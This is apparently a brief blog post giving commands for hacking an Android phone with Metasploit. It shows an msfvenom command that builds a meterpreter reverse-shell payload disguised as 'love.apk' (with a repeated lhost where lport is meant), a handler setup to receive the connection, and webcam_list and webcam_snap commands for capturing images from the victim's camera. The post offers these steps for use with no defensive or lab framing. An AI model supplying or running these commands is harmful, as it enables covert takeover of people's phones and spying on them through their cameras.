code for hacking android mobile using metasploit


msfvenom -p android/meterpreter/reverse_tcp lhost=’IP address’ lhost=4444 > /root/Desktop/love.apk

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.103(ur ip)
set lport 4444
exploit

webcam_list

webcam_snap

Comments

Post a Comment

Popular Posts